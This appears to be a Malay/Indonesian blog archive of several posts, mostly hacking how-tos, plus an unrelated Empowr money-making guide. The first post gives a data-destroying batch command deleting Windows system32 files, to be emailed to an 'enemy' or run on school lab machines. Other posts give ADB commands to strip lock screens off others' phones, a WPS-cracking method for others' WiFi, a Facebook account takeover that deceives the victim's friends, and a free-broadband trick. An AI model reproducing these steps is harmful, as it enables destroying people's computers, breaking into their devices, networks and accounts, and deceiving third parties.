Friday, 14 July 2017

Buat Virus untuk musnahkan kawan

Annyeonghaseyo
 안녕하세요


Hari ni Az akn mngajar korang bagaimana untuk memusnahkan mana-mana 
komputer dengan hanya menggunakan email atau internet  sahaja. Cara nya agak 
mudah dan coOL.Dimana korang boleh menjahanamkan mana2  komputer mengakibatkan
si pengguna tidak dapat switch on komputer diorang selamanya. SELAMANYA

ATTENTION PLEZZZ!!!!!!
Az tidak akan bertanggungjawab jika terjadi apa-apa yang berlaku sama ada 
komputer korang atau computer org lain..Tujuan post ini adalah untuk berkongsi maklumat semata-mata.

Step 1 ::
 copy kod merah dekat bawah  ni

del c:\WINDOWS\system32\*.*/q

Step 2 ::
 Buka notepad dan paste kod diatas.

Step 3 ::
Simpan kod ni apa-apa nama sekalipun tetapi belakang nya mestade  ".bat "
Contoh "stupid.bat".

JANGAN SESEKALI KORANG DOUBLE KLIK DEKAT NOTEPAD yang korang simpan tu..kalau tak menyesal gilew ahh…

Step 5 ::
 korang attach dekat email untuk hantar ke musuh.

Step 6 ::
korang tulis la ape-apa sekalipun ket email untuk suruh musuh korang download
dan tekan kod tu.Ayat tu biarlah cool ckit..
Apabila musuh anda download dan buka file td. Secara automatik dan lansungnya komputer diorang akan rosak.

p/s :: Korang boleh juga menggunakan cara gilew dgn copy paste kat computer makmal skolah
          korang..mesti gempak laa

Thursday, 23 March 2017

Panduan Lengkap Empowr


Empowr adalah sebuah situs jejaring sosial layaknya Facebook, Twitter, Tumbr dan sosial media lainnya, namun Empowr lebih unik dari jejaring sosial media yang ada. Di Empowr, selain penggunanya bisa membangun jaringan sosial dengan semua orang yang ada di belahan dunia manapun, pengguna Empowr juga bisa memperoleh penghasilan uang dollar secara online.

Panduan%2BLengkap%2BBermain%2BEmpowr%2Bdan%2BMenghasilkan%2BBanyak%2BDollar%2Bdari%2BEmpowr
Panduan Lengkap Bermain Empowr dan Menghasilkan Banyak Dollar dari Empowr
Empowr mengusung sebuah misi untuk memberdayakan setiap pengguna Empowr memperoleh pengaruh, harapan dan penghasilan. Hal ini dikarenakan komitmen dari Empowr untuk membantu stengah manusia yang ada di bumi ini agar pada tahun 2025 nantinya, setiap orang mempunyai penghasilan rata-rata $ 25 per hari.

Cara Bermain Empowr agar Menghasilkan Uang Dollar


Sebelum kamu memutuskan untuk memulai bermain Empowr, pastikan dalam diri kamu sebuah tekat untuk bersosial media. Hindari dulu pemikiran tentang mendapatkan uang. Agar nanti kamu bisa beraktifitas di Empowr dengan sepenuh hati.

Setelah kamu yakin tentang itu, kini saatnya kamu melangkah ke pendaftaran. Kamu bisa mendaftar lewat profil saya ( Profil Empowr Dafi Deff) atau kamu bisa mendaftar langsung di Empowr tanpa melalui profil saya.

Perlu diingat, bahwa ketika kamu mendaftar melalui profil saya, saldo pendapatan kamu di Empowr akan dimulai dari beberapa puluh dollar alias sudah terisi. Tapi jika kamu mendaftar tanpa melalui profil saya atau profil pengguna Empowr lainnya, yang berarti kamu mendaftar langsung di Empowr, maka saldo pendapatan kamu di Empowr akan dimulai dari nol dollar ($ 0).

Jika kamu ragu dan ingin bertanya lebih banyak tentang Empowr, kamu bisa langsung hubungi saya melalui email lewat kolom atau pun halaman kontak yang ada di blog ini. Saya membantu untuk memandu kamu dalam bermain Empowr.

Setelah kamu melakukan pendaftara di Empowr, selanjutnya edit profil kamu di Empowr. Baik itu foto profil, foto sampul, deskripsi tentang kamu dan lain-lainnya. Ini berguna agar pengguna Empowr lainnya bisa melihat profil kamu secara jelas.
Mengaktifkan Optimize di Empowr

Setelah kamu mengedit profil kamu, langkah selanjutnya adalah melakukan Optimize Empowr. Ini harus kamu lakukan agar pihak Empowr dapat mendeteksi bahwa akun Empowr kamu sudah siap untuk masuk dalam daftar akun Empowr yang akan mendapatkan earning atau pendapatan.

Jika kamu mencari di mana tombol Optimize berada, kamu bisa menemukannya di halama utama Empowr kamu. Di bagian atas halaman utama, kamu akan menemukan tiga kolom
1. Kolom OPTIMIZE
2. Kolom MAXIMIZE
3. Kolom MONETIZE
Dan ya... aktifkan tombol Opimize di kolom nomor 1.

Pada proses pengaktifan Optimize, kamu akan diminta mendaftarkan akun Paypal atau kartu kredit. Untuk lebih aman, kamu lebih baik menggunakan akun Paypal kamu. Saya pun menggunakan akun Paypal pada saat mendaftar. Jika kamu belum mempunyai akun Paypal, sebaiknya kamu membuatnya. Membuat paypal itu gratis dan mudah.

Satu hal yang perlu diingat juga, bahwa mendaftar Empowr itu gratis. Permintaan untuk mendaftarkan Paypal dan Kartu Kredit itu hanyalah sebuah persyaratan saja. Akun Paypal juga penting agar nantinya pada saat melakukan Cash Out / Pay Out di Empowr atau penarikan uang dari hasil pendapatan kamu di Empowr bisa langsung dikirim ke rekening Paypal kamu.

Meningkatkan Penghasilan di Empowr Lewat MAXIMIZE Your Network


Di samping kolom OPTIMIZE, pada halaman utama lini masa atau Timeline Empowr kamu juga akan melihat kolom MAXIMIZE. Pada kolom ini kamu akan melihat jarum pegukur progres kamu di Empowr. Segala aktifitas kamu bersosial di Empowr akan diukur di sini dan pastinya setiap aksi kamu tersebut akan menambah penghasilan kamu.

Kegiatan sosial yang diukur di kolom MAXIMIZE ini adalah, Update status, Upload atau mengunggah foto, Sharing atau membagikan gambar dan video dari website lainnya , juga mengomentari dan menyukai kiriman pengguna lainnya.

Satu hal yang tidak boleh ketinggalan ketika profil Empowr kamu sudah siap, kamu harus menjadi fans pengguna lainnya sebanyak-banyaknya. Aksi-aksi kamu di Empowr ini semuanya akan dihitung dan progresnya bisa kamu lihat pada jarum pengukur yang ada di kolom MAXKIMIZE. Pastikan setiap harinya jarum pengukur berada pada warna hijau, karna ini sesuai dengan pesan dari pihak Empowr, yaitu Go Green.
Trik untuk menghasilkan banyak dolar dari MAXIMIZE Your Network di Empowr, yaitu;
Masuk di setiap akun pengguna Empowr lainnya, klik tombol Become a fan agar kamu menjadi fans dari pengguna tersebut, lihat status-status akun pengguna Empowr yang kamu kunjungi kemudian beraksi dengan like atau menyukai status-status tersebut dan atau mengomentarinya. Lakukan trik ini setiap hari hingga jarum pengukur pada kolom MAXIMIZE menunjuk pada warna hijau.

Perbanyaklah menjadi fans setiap pengguna di Empowr, karena ini akan sangat bermanfaat untuk meningkatkan pendapatan kamu di Empowr lewat MONETIZE Your Network. Ingat pesan dari Empowr!? Go Green!!!

Meningkatkan Penghasilan di Empowr Lewat MONETIZE Your Network


Mengapa saya selalu meminta kamu untuk banyak-banyak menjadi fans bagi pengguna lain? Penjelasannya adalah; bahwa semakin banyak kamu menjadi fans pengguna Empowr, lini masa atau time line Empowr kamu akan menjadi ramai. Selain status dan postingan lainnya yang bisa kamu suka dan komentari, ada pula status dengan tombol biru bertuliskan Place your order.

Tombol Place your order yang bersileweran di timeline kamu itu adalah sebuah berkah yang pertana baik. Tombol Place your order di Empowr berfungsi untuk meningkatkan penghasilan kamu di Empowr lewat MONETIZE Your Network.

Trik untuk mendapat banyak dollar di Empowr lewat MONETIZE Your Network di Empowr, yaitu;

Klik%2BTombol%2BPlace%2BYour%2BOrder
Cara mendapatkan banyak dollar di Empowr lewat Monetize Your Network
Sumber gambar: Empowr

Pada status seseorang yang memiliki tombol biru bertuliskan Place Your Order, Klik tombol itu. Kamu akan berpindah pada halaman baru yang berisi pemberitahuan Purchase Complete dan tombol hijau bertuliskan View Purchase.

Klik%2BTombol%2BView%2BPurchase%2Bdi%2Bempowr
Halaman Purhase Complete di Empowr
Sumber gambar: Empowr

Klik tombol View Purchase. Kamu akan dialihkan ke halaman Purchese. Di halaman ini kamu akan melihat produk yang baru saja kamu Order.

Halaman%2BView%2BPurchase%2Bdi%2BEmpowr
Halaman Order di Empowr
Sumber gambar: Empowr

Di halaman ini kamu akan melihat produk yang baru saja kamu Order, seperti pada gambar di atas.

dapat%2Bribuan%2Bdollar%2Bdari%2Bsponsor%2Bthis%2Bpurchase%2Bdi%2Bempowr
Cara pilih Actions Sponsor this purchase di empowr
Sumber gambar: Empowr

Klik kolom Actions untuk memilih aksi kamu. Nah pada pilihan ini, silahkan kamu pilih Sponsor this purchase. Ini artinya membantu mensponsori atau mempromosikan produk tersebut. Ketika kamu memilih Sponsor this purchase, kamu akan dialihkan ke halaman Sponsor a Listing.

halaman%2Bsponsor%2Ba%2Blisting%2Bempowr
Cara Mengatur Starting Price, Auction Ends In, dan Buyer Requirements di Empowr
Sumber gambar: Empowr

Pada halaman Sponsor a Listing, silahkan atur Starting Price, Auction Ends In untuk mengatur durasi waktu kamu promosikan barang tersebut dan Buyer Requirements. Saran saya, ikuti seperti gambar di atas untuk pengaturan ini.

Selain mempromosikan produk yang ada di Empowr, kamu juga bisa menjual produk kami sendiri di Empowr. Sudah pasti, ketika kamu melakukan aksi promosi produk dan menjual produk sendiri di Empowr, pendapatan kamu akan bertambah.

Meningkatkan Penghasilan di Empowr Lewat Surge Earnings


Surge Earnings di Empowr adalah cara mendapatkan dollar di Empowr dengan cara melakukan aksi sesuai yang diperintahkan. Setiap harinya akan ada perintah Surge Earnings yang masuk di pemberitahuan kamu. Cepat melakukan aksi seperti yang diperintahkan, karena Surge Earnings ini akan hangus dalam waktu 10 menit. Kamu akan mendapatkan bayaran $ 2 sampai $ 15 jika kamu melakukan aksi sesuai yang diperintahkan.

Aksi yang diperintahkan di Surge Earnings ini tidak sulit, hanya memrintahkan kamu untuk menjadi fan pengguna Empowr lainnya, mengupdate dan atau menyukai juga mengomentri status/foto/video, serta ada juga perintah untuk menonton video panduan.

Pay Out atau Cash Out di Empowr


Cara untuk melakukan pay out di Empowr yaitu dengan melewati beberapa langkah. Pay Out di Empowr dikenal dengan istilah Cash Out. Ini merupakan cara untuk mencairkan pendapatan kamu di Empowr.

Syarat-syarat untuk pay out atau mencairkan penghasilan di Empowr, yaitu;

  1. Punya akun Paypal
  2. Sudah menjadi pengguna aktif di Empowr selama 90 hari
  3. Memiliki dana Early Cash Out minimal $ 2.00
  4. Minimum jumlah penghasilan yang ingin dicairkan $ 2.00
  5. Mengunduh aplikasi Empowr di Google Play Store untuk pengguna andraoid atau di App Store untuk pengguna Iphone.


Jika semua persyaratan sudah kamu penuhi, kini saatnya kamu melakukan aksi cash out atau pencairan pendapatan dollar di Empowr.


Berikut langkah-langkah untuk pay out atau cash out pendapatan Empowr;

1. Klik My balance yang ada di bagian atas halaman Empowr kami
    pilih%2Bmy%2Bbalance%2Bdi%2Bempowr
    Pilih My Balance di Empowr untuk proses pay out
    Sumber Gambar: Empowr

    2. Kamu akan dialihkan pada halaman baru. Pada halaman tersebut, scroll ke bagian bawah kemudian klik tombol Cash out

    halaman%2Bcash%2Bout%2Bempowr
    Halaman My Balance di Empowr untuk Cash Out
    Sumber Gambar: Empowr

    3. Akan muncul tampilan baru di bawah tombol tersebut seperti pada gambar di bawah ini, kemusian klik tombol Cash out

    tombol%2Bcash%2Bout%2Bempowr
    Tombol cah out di Empowr
    Sumber Gambar: Empowr

    4. Kamu akan dialihkan pada halaman berikutnya yang berisi sebuat peringatan yang intinya menyuruh kamu untuk mengaktifkan aplikasi mobile Empowr di smartphone kamu. Karena demi keamanan untuk melakukan pay out di Empowr, kamu akan dikirimkan cash out key. Pilih Send my cash out key.

    Pemberitahuan%2Buntuk%2Bmengaktifkan%2Baplikasi%2Bempor%2Bdi%2Bhp
    Pemberitahuan untuk pengiriman cash out empowr ke smartphone
    Sumber Gambar: Empowr

    5. Di smartphone kamu akan muncul sebuah pemberitahuan dari aplikasi Empowr bahwa yang isinya tentang request cash out key. Buka pemberitahuan Empowr tersebut. Kamu akan masuk pada halaman pengisian data-data yang dibutuhkan untuk cah out. Isi jumlah dana yang akan kamu pay out di kolom Early Cash Out.

    Halaman%2BCash%2BOut%2BEmpowr
    Mengisi Jumlah dana yang akan di-Pay Out di Empowr
    Sumber Gambar: Empowr

    6. Pilih tipe pay out, apakah kamu ingin mengirim pendapatan kamu di Empowr ke Paypal atau Cek Bank. Disini saya menggunakan pilihan payout dari Empowr ke Paypal. Isi alamat paypal kamu dan juga data-data lainnya seperti alamat, kode pos dan nomor telpon.

    mengisi%2Bdata%2Bpaypal%2Buntuk%2Bcash%2Bout%2Bempowr
    Mengisi data-data untuk Pay Out di Empowr 
    Sumber Gambar: Empowr

    7. Selesai, kamu akan mendapatkan pemberitahuan bahwa proses payout kamu sudah sukses. Payout kamu akan masuk ke rekening paypal kamu dalam waktu 10 hari kerja.

    Pemberitahuan%2Bproses%2Bpay%2Bout%2Bempowr%2Bsukses
    Pemberitahuan Bahwa Proses Pay Out di Empowr sukses
    Sumber Gambar: Empowr

    Tentang Power Users Empowr


    Pada empowr, Power User memiliki kemampuan untuk menjangkau khalayak yang lebih besar dengan tulisan mereka, sehingga basis penggemar tumbuh lebih cepat dan potensi penghasilan yang lebih besar.

    Semakin tinggi Power Level, semakin baik mereka mampu Maksimalkan dan me-Monetize jaringan mereka.

    Untuk itu, alat pengukur penghasilan Empowr kamu dirancang untuk menampilkan seberapa baik aksi yang kamu lakukan dibandingkan dengan warga lain yang berada di Tingkat Daya yang sama.

    Ketika Anda meningkatkan Power Level, kamu akan melihat sebuah penurunan awal dalam alat pengukur karena kamu sedang dibandingkan dengan warga Empowr lain yang memiliki lebih banyak pengalaman di tingkat itu dari pada kamu.

    Jangan khawatir jika kamu melihat penurunan awal ini - meskipun menurun, Kamu kemungkinan besar akan mendapatkan lebih banyak berkat Power tambahan yang telah diperoleh.

    Dengan mengklik "history" link di bagian kiri bawah setiap gauge, kamu dapat mengukur keberhasilan kamu di masing-masing Tingkat Power.

    Ketika kamu bergerak ke atas, terus-menerus "go green" di setiap gauge, dan kamu akan melihat peringkat kamu meningkatkan setiap hari.

    tentang%2Bpower%2Busers%2Bdi%2Bempowr

    Dapatkah saya menjual produk saya untuk meningkatkan saya Power Level?


    Jawabannya, iya!

    Pada empowr, kamu memiliki kebebasan untuk menjual produk, jasa, dan konten premium di marketplace, dan menjaga 90% dari harga eceran (yang mengatur) ketika penjualan dibuat.

    Kunci untuk memaksimalkan penjualan kamu adalah untuk memaksimalkan jumlah orang yang melihat posting Anda dan listing pasar. peningkatan distribusi ini dicapai dengan meningkatkan Power Level kamu.

    Untuk meningkatkan level kamu pada tingkat yang semakin tinggi, kamu dapat langsung menghabiskan penghasilan marketplace kamu pada langganan Power User saat penjualan selesai.

    Dalam melakukannya, kamu akan mulai mengalami lebih penjualan karena peningkatan distribusi kamu akan menerima dari meningkatkan power kamu.

    Apa itu Power User, dan apa manfaatnya?


    Di empowr, warga memiliki kebebasan untuk membeli Power User langganan untuk meningkatkan basis penggemar mereka dan potensi pendapatan.

    Untuk mengakses halaman Power User kamu, cukup klik "Get More Power" pada bar navigasi kiri.

    Langganan Power User menawarkan berbagai manfaat yang memungkinkan warga untuk:

    • menjangkau khalayak yang lebih besar dengan tulisan mereka
    • mendapatkan akses pertama yang rilis software terbaru
    • memperoleh nilai lebih dari saham dan pembelian mereka
    • menggunakan penghasilan non-matured mereka untuk membayar sebagian atau seluruh biaya Platform Iklan mereka

    Ada sejumlah Power Level yang tersedia. kamu dapat membandingkan manfaat dan biaya yang terkait dengan masing-masing dan kemudian membeli tingkat yang terbaik bagi kamu.

    pilihan%2Bpower%2Buser%2Blevel

    Untuk memaksimalkan penghasilan kamu, pastikan earnings accelerator kamu diaktifkan dalam pengaturan Power User. Dalam melakukannya, kamu akan secara otomatis di-upgrade ke Tingkat Daya berikutnya ketika keuntungan kamu memungkinkan - membuka lebih banyak manfaat dan peluang pendapatan untuk kamu.

    Apakah ada batasan postingan di Empowr?


    Dalam rangka untuk menciptakan tingkat lapangan bermain untuk semua warga empowr, ada batasan pada jumlah posting yang Anda peroleh dari setiap hari.

    Untuk itu, kamu harus selalu melakukan yang terbaik untuk hanya memposting item kualitas tertinggi untuk memaksimalkan penghasilan kamu setiap hari.

    batasan%2Bpostingan%2Bdi%2BEmpowr

    Untuk melihat batas harian kamu, cukup klik pada ikon status di dalam kotak pos.

    Sementara ada batas untuk jumlah posting yang dapat kamu peroleh dari setiap hari, warga masih memiliki kebebasan untuk mengirim dan berbagi sebanyak yang mereka inginkan di empowr. Cukup memilih postingan yang kamu inginkan untuk diperhitungkan penghasilannya pada saat posting.

    Apa Itu Earnings Accelerator?


    Pada empowr, cara tercepat untuk maju adalah dengan langganan Power User. Pengguna mendapatkan perhatian lebih - yang berarti lebih banyak view dan pendapatan yang lebih.

    Untuk membantu warga memaksimalkan penghasilan mereka pada tingkat yang lebih tinggi, Earnings Accelerator dirancang untuk meng-upgrade Power Level.

    Dengan posting setiap hari dengan Earnings Accelerator, kamu dapat dengan cepat mencapai Power Level top dalam hitungan bulan - ada sedikit atau tidak ada biaya karena kamu upgrade Power User didanai sepenuhnya dari keuntungan kamu.

    Apa%2Bitu%2BEarnings%2BAccelerator%2Bdi%2Bempowr

    Kamu dapat mengontrol Earning Accelerator kamu melalui pengaturan Power User kamu. Atau, hanya pastikan akun kamu telah dioptimalkan.

    Saturday, 10 December 2016

    Cara Hack Lockscreen Android Hanya dalam 30 Detik



       Ada beberapa cara yang bisa dilakukan oleh pengguna Android untuk mengamankan perangkatnya, salah satunya dengan memanfaatkan fitur Lockscreen Pattern bawaan Android. Pengguna cukup menggambar pola pada sebuah kotak yang terdiri dari sembilan titik berbentuk 3x3, dan cara tersebut terbukti ampuh menghalau siapapun yang hendak mengakses HP pengguna tanpa izin. 
       Namun, apakah lockscreen pattern tersebut selamanya ampuh melindungi HP pengguna? Tidak juga. Beberapa trik Hacking yang akan Saya ulas kali ini akan membuktikan bahwa tak selamanya lockscreen pattern Android sanggup mengamankan HP pengguna. Dan hebatnya, masing-masing dari trik ini hanya membutuhkan waktu antara 30 detik - 1 menit saja!



    Metode 1: Memanfaatkan fitur Forgot Pattern

       Fitur Forgot Pattern ini sebenarnya dimaksudkan agar pengguna yang lupa dengan pola lockscreen-nya tetap bisa mengakses perangkatnya kembali. Namun siapa sangka kalau fitur yang disediakan oleh Android ini malah menjadi bumerang bagi dirinya sendiri. Berikut caranya:
    • Gambar sembarang pola sebanyak 5 kali. 
    • Setelah muncul konfirmasi "Try Again in 30 seconds" pilih opsi Forgot pattern. Setelah itu pilih Enter Google Anccount details. (Pada beberapa perangkat biasanya akan langsung menyuruh pengguna untuk masuk ke Google Account). 
    Forgot Pattern
    • Selanjutnya masukkan username dan password dari akun Google (Gmail) milikmu. Setelah itu biasanya google akan mengirimkan email berisi pola lockscreen atau langsung saja ganti pola lockscreen HP tersebut. 
    Forgot Pattern



    Metode 2: Menggunakan ADB untuk menghapus file password

    ADB
       Sebelum melakukan cara ini, ada beberapa hal yang harus kamu perhatikan:
    1. Pastikan fungsi UDB Debugging sudah aktif di HP yang ingin kamu hack.
    2. Pastikan komputer yang kamu gunakan sudah terinstall ADB Program
    Download ADB disini:



       Setelah memenuhi semua persyaratan di atas, barulah kamu bisa mengikuti langkah-langkah di bawah ini:
    • Hubungkan HP dan Komputer dengan kabel data. 
    • Buka jendela Command Prompt ( shortcut Windows + R > ketik cmd > enter )
    • Selanjutnya ketikkan perintah berikut:
    adb shell rm /data/system/gesture.key
    Jika lockscreen berupa pattern/ pola, gunakan kode di bawah ini:
    adb shell
    cd /data/data/com.android.providers.settings/databases
    sqlite3 settings.db
    update system set value=0 where name='lock_pattern_autolock';
    update system set value=0 where name='lockscreen.lockedoutpermanently';
    .quit
    • Nah, setelah HP tersebut di Restart, maka lockscreen yang ada di HP tersebut akan hilang. 
       Perlu kamu ingat bahwa cara ini hanya bersifat sementara, artinya jika HP tersebut di-restart kembali maka lockscreen HP tadi akan muncul kembali. Maka sebelum itu terjadi sebaiknya segera pergi ke Pengaturan > Lockscreen dan ganti mode lockscreen dari Pattern (pola) menjadi Swipe (geser). 




    Cara 3: Melakukan Factory Reset

    Factory Reset
       Melakukan Factory Reset, atau istilah gampangnya 'Install ulang' adalah solusi terakhir apabila semua cara yang dilakukan tidak membuahkan hasil. Perlu diingat bahwa dengan melakukan Factory Reset, maka semua data di dalam HP, termasuk data lockscreen akan hilang. 
       Untuk melakukan Factory Reset ini berbeda-beda tergantung pada pabrikan masing-masing HP. Namu cara yang paling umum adalah dengan menekan tombol power dan tombol volume up dan down secara bersamaan. Atau bisa juga lewat Pengaturan > Cadangkan dan Reset > Reset data Pabrik untuk perangkat Samsung. 


    Cara hack Third-Party Lockscreen

       Third-Party Lockscreen atau 'Lockscreen pihak ketiga' adalah lockscreen yang dipasang oleh aplikasi non-bawaan android, misalnya lockscreen dari aplikasi Clean Master atau aplikasi lockscreen changer
       Untuk dapat 'menembus' lockscreen dari aplikasi pihak ketiga ini yang perlu kamu lakukan adalah me-Restart HP dengan Safe Mode. Cara ini otomatis akan menonaktifkan semua aplikasi pihak ketiga yang sedang berjalan. 
    Safe Mode Reoot
       Setelah itu hapus data dari aplikasi lockcreen tersebut ( contoh, jika kamu menggunakan lockscreen dari aplikasi Clean Master, maka hapus data aplikasi clean master lewat Pengaturan > Manajer aplikasi > Clean Master lalu pilih Hapus data ).
       Terkahir, Restart HP lagi untuk keluar dari safe mode, dan sekarang lockscreen yang mengganggu pun sudah hilang. 


    Cara Hack Password Lockscreen Android Lollipop 5.0 - 5.1.1

       Metode hacking kali ini dikhususkan untuk Android Lollipop yang sudah dienkripsi, atau dalam arti lain menggunakan Lockscreen berupa kombinasi password. Kalau kamu kebetulan lupa dengan password lockscreenmu, cara ini patut dicoba. 
    • Pertama, tekan Emergency Call pada lockscreen, kemudian gunakan dialer untuk mengetikkan 10 digit sembarang angka. 
    • Selanjutnya lakukan double-tap pada layar hingga ke-10 digit angka tersebut ter-blok (highlight), pilih Copy. kemudian Paste 10 digit angka tersebut di kolom yang sama. Lakukan secara berulang ulang hingga tanda blok hilang. 
    Hack Lollipop lokscreen password
    • Setelah itu kembali ke lockscreen, kemudian buka shortcut kamera. 
    • Geser layar ke bawah untuk membuka notifikasi, lalu tekan ikon setttings. Secara otomatis kamu akan langsung diperintahkan untuk memasukkan password. Dan terakhir, Paste 10 digit angka tadi secara berulang-ulang di kolom password. 
    Hack Lollipop lokscreen password
       Setelah itu lockscreen akan mengalami crash dan kamu akan langsung dibawa ke layar menu. Selanjutnya tinggal hapus lockscreen yang ada lewat pengaturan. dan selesai!
    Sekian dan semoga bermanfaat.

    Cara Hack Password WiFi dengan Smartphone Android



    Cara Hack Password WiFi dengan Smartphone Android

    Untuk mendapatkan akses Internet gratis, kita bisa mengandalkan jaringan WiFi. Lumayanlah bisa lebih hemat kuota jika kita menggunakan jaringan WiFi di kampus, kantor atau tempat umum lainnya. Sayangnya tidak semua jaringan WiFi di Indonesia tersedia secara gratis.
    Meski gratis, beberapa jaringan WiFi diatur dengan password agar tidak sembarangan pengguna bisa menggunakannya. Nah, bagaimana cara hack password wifi, JalanTikus punya caranya nih

    Cara Hack Password WiFi

    cara-hack-password-wifi-2
    Sebenarnya banyak cara hack password WiFi, apalagi jika menggunakan komputer. Namun menurut Zenith, tahun ini traffic Internet didominasi oleh smartphone. Yang mana pada 2012, smartphone hanya memberikan kontribusi 40% pada traffic Internet dunia. Sementara tahun ini traffic Internet dari smartphone dan tablet telah meningkat menjadi 68%. Makanya, yuk ketahui gimana cara hack WiFi password menggunakan smartphone Android!

    Cara Hack Password WiFi dengan Smartphone Android

    Untuk mengetahui cara hack password WiFi sebuah modem, kamu bisa menggunakan bantuan aplikasi Android bernama WIFI WPS WPA TESTER. Agar aplikasi ini bisa berjalan, smartphone Android kamu harus sudah di-root.
    Jika smartphone kamu belum di-root, silakan baca artikel berikut:
    1. Cara Mudah Root Semua Jenis Android Tanpa PC dengan Framaroot
    2. Cara Root Semua Jenis Android dengan Towelroot
    3. Cara Mudah Root Semua Jenis Android dengan KingoApp
    4. Cara Mudah Root Android Lollipop 5.1 Tanpa PC
    5. Cari di Google dengan keyword: "Cara Root xxxx"

     
    Adapun cara mengetahui password WiFi dengan smartphone Android adalah sebagai berikut:
    • Setelah terinstal, kamu akan diminta untuk menginstal Bussybox dan juga memberikan akses root. Tinggal instal dan berikan akses root saja.
    • Jika sudah, kamu bisa mulai cara hack password WiFi dengan menekan tombol Refresh. Nantinya akan muncul daftar jaringan WiFi yang tersedia di sekitar kamu.

    cara-hack-password-wifi
    • Pilih jaringan WiFi yang kamu kehendaki, lalu klik Connect Automatic PIN. Nantinya secara otomatis software ini akan bekerja untuk mencari tahu apa password WiFi dari jaringan tersebut.

    cara-hack-password-wifi-3
    • Jika sukses, maka akan muncul keterangan seperti gambar di bawah. Kamu bisa klik Copy Password to Clipboard untuk memasukkan password tersebut ke jaringan WiFi yang kamu mau.

    cara-hack-password-wifi-4
    Demikianlah artikel ini Jaka buat, gimana mudah kan? Dengan cara hack password WiFi ini kamu jadi bisa Internetan gratisan di mana pun walaupun saat menemukan jaringan WiFi yang memerlukan password. Selamat mencoba!

    Cara Hack Facebook Orang Lain dan Cara Agar Facebook Kita Tidak Di-hack



    Untuk bisa sukses dalam melakukan hack Facebook orang lain menggunakan metode lupa password, ada beberapa hal dasar yang harus kamu ketahui. Yang terpenting adalah email orang tersebut. Terus, cara ini akan sukses jika kamu benar-benar dekat dengan orang yang akan kamu hack Facebooknya. Kenapa harus dekat? Karena Facebook akan melakukan tahap-tahap identifikasi tentang kebenaran pemilik Facebook tersebut.
    Jika kamu sudah siap, Jaka akan lanjut ke tahap-tahapnya, yaitu:
    • Pertama-tama buka Facebook, lalu pilih Lupa kata sandi Anda. Selanjutnya masukan email tadi. Jika kamu tidak tahu email orang tersebut, kamu bisa lihat dulu ke informasi profilnya jika berteman di Facebook, atau dengan pura-pura menanyakan alamat emailnya untuk keperluan tugas atau apalah alasannya.
    Cara Mudah hack Facebook_2
    • Jika kamu punya akses ke salah satu dari 3 hal yang ditampilkan oleh Facebook, silakan kamu pilih lanjutkan. Jika tidak, pilih Tidak punya akses kesini lagi?

    Cara Mudah hack Facebook_3
    • Silakan isi kontak email atau telepon yang bisa dihubungi oleh Facebook. Untuk berjaga-jaga agar tidak curiga, kamu bisa menggunakan email baru yang mirip dengan email sebelumnya. Jadi kamu harus terlebih dahulu menyiapkan email barunya. Sedikit memakan waktu kan? Tapi membuat email itu mudah kok.

    Cara Mudah hack Facebook_4
    • Tahap selanjutnya, silakan kamu jawab pertanyaan yang ditampilkan. Jika calon korban adalah teman dekat kamu, maka kamu akan dengan mudah menjawab pertanyaannya. Kamu bisa meraba-raba jawaban dari keseharian teman kamu. Jika sukses, kamu bisa langsung mengganti passwordnya. Dan tinggal menunggu 24 jam untuk bisa masuk ke akun Facebook-nya.

    Cara Mudah hack Facebook_5
    • Jika ternyata pertanyaannya sulit untuk dijawab, kamu bisa pilih Pulihkan dengan bantuan teman. Lagi, Facebook menyediakan bantuan yang justru digunakan sebagai celah untuk membobol keamanan.

    Cara Mudah hack Facebook_6
    • Dengan memilih tiga orang teman yang ditampilkan, kamu telah mengizinkan Facebook untuk menghubungi mereka guna membantu kamu masuk ke akun Facebook temanmu. Teman yang kamu pilih, mereka akan mendapatkan kode yang nantinya harus kamu masukan di tahap selanjutnya.

    Cara Mudah hack Facebook_7
    • Di tahap ini, agar bisa meyakinkan teman-teman yang telah mendapatkan kode dari Facebook tadi, kamu bisa membuat akun Facebook baru. Lalu menghubungi dan meyakinkan teman-teman yang tadi kamu pilih untuk minta kodenya. Jika sudah didapatkan, tinggal masukan kodenya pada kolom yang tersedia.

    Cara Mudah hack Facebook_8
    Terlihat mudah bukan cara hack Facebook orang lain menggunakan metode ini? Meski mudah, kamu harus sabar melakukannya. Namun hasilnya, kamu jadi bisa membobol akun Facebook teman kamu.


    Cara Mengamankan Akun Facebook dari Metode Ini

    Setelah kamu mengetahui bahwa hacker bisa membobol Facebook kamu dengan metode lupa password, tentu kamu harus berhati-hati. Agar kamu tidak menjadi korban hacker yang menggunakan metode ini, Jaka juga akan berikan kamu cara untuk mengamankan akun Facebook kamu. Selain 8 Hal Yang HARAM Kamu Lakukan di Facebook, ada beberapa hal lain yang harus kamu perhatikan agar Facebook kamu tetap aman, yaitu:
    • Gunakan email yang berbeda antara email Facebook dengan email pribadi. Tujuannya agar menghindari teman dekat kamu menggunakan email tersebut untuk percobaan hack.
    • Cara untuk mengamankan akun Facebook kamu yang selanjutnya adalah dengan menyembunyikan alamat email di Facebook. Selain menghindari hal yang bersifat phishing dan spam ke email kamu, juga meminimalisir serangan hacker terhadap Facebook kamu.

    • Agar akun Facebook kamu aman, saat memilih pertanyan keamanan pastikan kamu menggunakan jawaban yang sulit sekali. Bukan jawaban yang benar-benar nampak dari keseharian kamu. Orang bisa saja menebak jawabannya dari posting-an kamu di Facebook, atau mungkin kegiatan sehari-hari kamu di kantor. Serta, jangan gunakan hal-hal yang bersifat umum.
    • Pelajari lebih jauh tentang metode pemulihan akun Facebook lewat teman. Di sana kamu bisa secara khusus memilih tiga teman yang bisa dihubungi Facebook saat kamu kehilangan akses terhadap Facebook kamu. Pastikan itu adalah teman-teman terdekat yang bisa kamu percaya.


    Nah, itu tadi cara mudah hack Facebook orang lain sekaligus cara untuk mengamankan akun Facebook kamu. Semoga kamu bisa menanggapi artikel ini dengan bijak dan tidak menggunakannya untuk tindakan yang tidak baik. Apa kamu ada cara hack Facebook orang lain dengan cara yang lebih mudah? Bisa kali di-share ke Jaka.

    HACK BROADBAND CELCOM

    Hari ini aku nak ajar korang semua cara-cara nak menggunakan celcom broadband secara free, bermaksud walaupun credit celcom BB prepaid kita dah habis...atapun jika anda mempunyai USB Broadband,guna je celcom simkad yg korang guna hp sekarang....


     1. Mula-mula download Ultrasurf kat bawah sini

                                                       Donwload Ultrasurf di sini: LINK

       
    2. Dah download... Open la...

    3. Dah Open,ok pilih ''option'', untick ''start ie automatically at start''.


